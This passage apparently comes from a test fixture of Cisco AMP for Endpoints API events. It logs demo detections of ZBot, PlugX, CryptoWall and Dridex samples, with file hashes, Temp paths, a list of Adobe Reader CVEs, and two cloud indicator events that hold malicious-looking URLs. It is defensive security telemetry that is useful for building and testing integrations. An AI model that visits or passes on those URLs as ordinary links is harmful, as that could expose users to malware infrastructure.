Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":404000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":201000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900074000600,"timestamp":1610704962,"timestamp_nanoseconds":74000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900373000000,"timestamp":1610704962,"timestamp_nanoseconds":373000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":560000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506561","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506562","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395429000700,"timestamp":1610704954,"timestamp_nanoseconds":429000000,"date":"2021-01-15T10:02:34+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704954,"start_date":"2021-01-15T10:02:34+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906243727720000,"timestamp":1610704934,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:02:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906243727720449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825615424644973000,"timestamp":1610704922,"timestamp_nanoseconds":703000000,"date":"2021-01-15T10:02:02+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112390223000800,"timestamp":1610704898,"timestamp_nanoseconds":965000000,"date":"2021-01-15T10:01:38+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704898,"start_date":"2021-01-15T10:01:38+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Accessed URL matches characteristics of several malware families.","short_description":"GateDotPhp.ioc"},"network_info":{"dirty_url":"http://flashtamp.info/datas/gate.php","parent":{"disposition":"Clean","identity":{"sha256":"72c027273297ccf2f33f5b4c5f5bce3eecc69e5f78b6bbc1dec9e58780a6fd02"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112389350000600,"timestamp":1610704885,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:01:25+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704885,"start_date":"2021-01-15T10:01:25+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Svchost.exe accessed a Wordpress URL - this is anomalous and indicative of a process injection.","short_description":"W32.SvchostHitWordpressURL.ioc"},"network_info":{"dirty_url":"http://laptopsinhvien.net/wp-content/plugins/better-wp-security/modules/free/brute-force/js/ap3.php?t=i3fktdvzoauf","parent":{"disposition":"Clean","identity":{"sha256":"cb2bc00985f641f9900aa0adc5fc203eaaf57394412dc4ce4b37222ef519205f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208098324251000,"timestamp":1610704881,"timestamp_nanoseconds":90000000,"date":"2021-01-15T10:01:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208098324250639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat 